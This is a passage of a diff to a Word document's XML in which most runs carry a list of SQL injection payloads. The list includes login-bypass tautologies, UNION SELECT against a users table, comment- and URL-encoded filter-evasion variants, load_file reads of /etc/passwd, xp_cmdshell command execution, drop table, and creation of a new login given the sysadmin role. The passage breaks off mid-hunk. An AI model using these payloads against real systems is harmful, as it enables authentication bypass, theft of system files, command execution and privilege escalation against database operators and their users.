-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'something' like 'some%' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2 &gt; 1 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'text' &gt; 't' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'whatever' in ('whatever') </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2 BETWEEN 1 and 3 ' or username like char(37); </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' union</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> select * from users where login = char(114,111,111,116); </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' union</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> select  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Password:*/=1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">UNI/**/ON SEL/**/ECT </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'; EXEC ('SEL' + 'ECT US' + 'ER') </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'/**/OR/**/1/**/=/**/1 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' or</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1/* +or+isnull%281%2F0%29+%2F* </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">%27+OR+%277659%27%3D%277659 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">%22+or+isnull%281%2F0%29+%2F* </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">%27+--+&amp;password= </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>'; begin declare @</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>8000) set @</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>=':' select @</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>=@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">+'+login+'/'+password+' ' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> users where login &gt;   </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>@</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> select @</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> into temp end -- </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' and</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 in (select </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> from temp)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' union</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> select 1,load_file('/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'),1,1,1; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' and 1=( if((</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>load_file</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));</w:t>
+        <w:t>' and 1=( if((load_file(char(110,46,101,120,116))&lt;&gt;char(39,39)),1,0));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -41145,110 +38638,108 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>'; exec master</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>'; exec master..xp_cmdshell 'ping 10.10.1.2'</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>..</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>xp_cmdshell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 'ping 10.10.1.2'</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">CRATE USER name IDENTIFIED BY 'pass123' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">CRATE USER name IDENTIFIED BY 'pass123' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' ; drop table temp </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> drop table temp </w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve">exec sp_addlogin 'name' , 'password' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">exec sp_addsrvrolemember 'name' , 'sysadmin' </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -41259,309 +38750,97 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
